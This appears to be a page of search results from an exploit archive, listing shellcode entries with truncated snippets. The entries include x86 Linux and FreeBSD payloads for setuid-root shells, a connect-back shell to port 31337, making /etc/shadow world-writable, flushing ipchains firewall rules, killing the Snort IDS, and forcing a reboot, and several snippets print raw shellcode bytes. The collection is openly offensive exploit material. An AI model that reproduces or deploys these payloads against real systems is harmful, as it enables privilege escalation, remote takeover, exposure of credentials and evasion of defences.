56 matches found
linux/x86 - setuid0 + execve/bin/sh 28 bytes
linux/x86 setuid0 + execve/bin/sh 28 bytes. Shellcode exploit for linx86 platform / revenge-setuid.c, v1.0 2006/09/30 14:57 linux/x86 setuid0 + execve"/bin//sh", "/bin//sh", NULL shellcode once again... setuid 6 bytes + execve 22 bytes = 28 bytes Same as revenge-execve.c we start the 2 system cal...
linux/x86 re-use of /bin/sh string in .rodata shellcode 16 bytes
Exploit for linux/x86 platform in category shellcode ================================================================ linux/x86 re-use of /bin/sh string in .rodata shellcode 16 bytes ================================================================ / $Id: reusage-linux.c,v 1.3 2004/01/30 20:08:46...
freebsd/x86 - rebootRB_AUTOBOOT Shellcode 7 bytes
freebsd/x86 rebootRBAUTOBOOT Shellcode 7 bytes. Shellcode exploit for freebsdx86 platform / FreeBSDx86-reboot-7b.c Shellcode, rebootRBAUTOBOOT, 7 bytes by IZ / char shellcode = "\x31\xc0" / xor %eax,%eax / "\x50" / push %eax / "\xb0\x37" / mov $0x37,%al / "\xcd\x80"; / int $0x80 / void main int...
linux/x86 execve(/bin/sh) + ZIP Header 28 bytes
No description provided by source. / linux/x86 - execve"/bin/sh", "/bin/sh", NULL + ZIP Header - 28 bytes root@magicbox: file linux-sh-ziphdr.bin linux-sh-ziphdr.bin: Zip archive data - izik [email protected] / char shellcode = // // ZIP Header 5 bytes // "\x50" // push %eax "\x4b" // dec %ebx...
linux/x86 execve(/bin/sh) + Bitmap Header 27 bytes
Exploit for linux/x86 platform in category shellcode ================================================== linux/x86 execve/bin/sh + Bitmap Header 27 bytes ================================================== / linux/x86 - execve"/bin/sh", "/bin/sh", NULL + Bitmap 24bit Header - 27 bytes...
linux/x86 SWAP restore shellcode 109 bytes
Exploit for linux/x86 platform in category shellcode ========================================== linux/x86 SWAP restore shellcode 109 bytes ========================================== / linux-x86-swap-restore.c - SWAP restore shellcode 109 bytes for Linux/x86 Copyright c 2006 Gotfault Security &...
linux/x86 execve("/bin/sh", ["/bin/sh", NULL]) 23 bytes
Exploit for linux/x86 platform in category shellcode ======================================================= linux/x86 execve"/bin/sh", "/bin/sh", NULL 23 bytes ======================================================= / linux-x86-binshv2.c - 23 bytes Copyright c 2006 Gotfault Security Linux/x86...
linux/x86 execve /bin/sh (encoded by +1) 39 bytes
Exploit for linux/x86 platform in category shellcode ================================================= linux/x86 execve /bin/sh encoded by +1 39 bytes ================================================= / linux/x86 - execve"/bin/sh", "/bin/sh", NULL / encoded by +1 - 39 bytes - izik / char shellcod...
linux/x86 quick (yet conditional, eax != 0 and edx == 0) exit 4 bytes
Exploit for linux/x86 platform in category shellcode ===================================================================== linux/x86 quick yet conditional, eax != 0 and edx == 0 exit 4 bytes ===================================================================== / linux/x86 quick yet conditional, e...
linux/x86 normal exit w/ random (so to speak) return value 5 bytes
Exploit for linux/x86 platform in category shellcode ================================================================== linux/x86 normal exit w/ random so to speak return value 5 bytes ================================================================== / linux/x86 normal exit w/ random so to speak...
linux/x86 normal exit with random so to speak return value 5 bytes
linux/x86 normal exit w/ random so to speak return value 5 bytes. Shellcode exploit for linx86 platform / linux/x86 normal exit w/ random so to speak return value - 5 bytes - izik / char shellcode = "\x31\xc0" // xor %eax,%eax "\x40" // inc %eax "\xcd\x80"; // int $0x80 int mainint argc, char arg...
linux/x86 setreuid(0, 0) + execve(/bin/sh) 31 bytes
Exploit for linux/x86 platform in category shellcode =================================================== linux/x86 setreuid0, 0 + execve/bin/sh 31 bytes =================================================== / linux/x86 setreuid0, 0 + execve"/bin/sh", "/bin/sh", NULL, NULL - 31 bytes - izik / char...
linux/x86 connect-back shellcode 127.0.0.1:31337/tcp 74 bytes
No description provided by source. / linux/x86 connect-back shellcode, 127.0.0.1:31337/tcp - 74 bytes - izik [email protected] / char shellcode = "\x6a\x66" // push $0x66 "\x58" // pop %eax "\x99" // cltd "\x6a\x01" // push $0x1 "\x5b" // pop %ebx "\x52" // push %edx "\x53" // push %ebx "\x6a\x02" /...
linux/x86 eject cd-rom (follows /dev/cdrom symlink) + exit() 40 bytes
Exploit for linux/x86 platform in category shellcode ===================================================================== linux/x86 eject cd-rom follows /dev/cdrom symlink + exit 40 bytes ===================================================================== / linux/x86 eject cd-rom follows...
linux/x86 dup20,0; dup20,1; dup20,2; 15 bytes
linux/x86 dup20,0; dup20,1; dup20,2; 15 bytes. Shellcode exploit for linx86 platform / dup2loop-core.c by Charles Stevenson I made this as a chunk you can paste in to make modular remote exploits. I usually combine this with an execve as the second stage of a read jmp %esp / char hellcode = /...
linux/x86 ipchains -F 49 bytes
Exploit for linux/x86 platform in category shellcode ============================== linux/x86 ipchains -F 49 bytes ============================== include include / asm" sub $0x4,%esp Con esto conseguimos que la shellcode nunca se popl %esp sobreescriba... gracias RaiSe : xorl %edx,%edx %edx a cer...
linux/x86 connect 120 bytes
Exploit for linux/x86 platform in category shellcode =========================== linux/x86 connect 120 bytes =========================== / Connecting shellcode written by lamagra http://lamagra.seKure.de May 2000 .file "connect" .version "01.01" .text .align 4 start:...
linux/x86 cp /bin/sh /tmp/katy ; chmod 4555 katy 126 bytes
Exploit for linux/x86 platform in category shellcode ========================================================== linux/x86 cp /bin/sh /tmp/katy ; chmod 4555 katy 126 bytes ========================================================== / Linux/x86 /bin/cp /bin/sh /tmp/katy ; chmod 4555 /tmp/sh using fo...
linux/x86 chmod 666 /etc/shadow 82 bytes
Exploit for linux/x86 platform in category shellcode ======================================== linux/x86 chmod 666 /etc/shadow 82 bytes ======================================== / email protected Usando execve y un array de punteros include main char name4; name0="/bin/chmod"; name1="666";...
linux/x86 kill snort 151 bytes
No description provided by source. / x86 linux "snort IDS" shutter shellcode size 151 By nob0dy // find your own reality / / char snortshuttershellcode = "\xeb\x03\x5e\xeb\x05\xe8\xf8\xff\xff" "\xff\x83\xc6\x0d\x31\xc9\xb1\x80\x80" "\x36\x01\x46\xe2\xfa\xea\x18\x2e\x74"...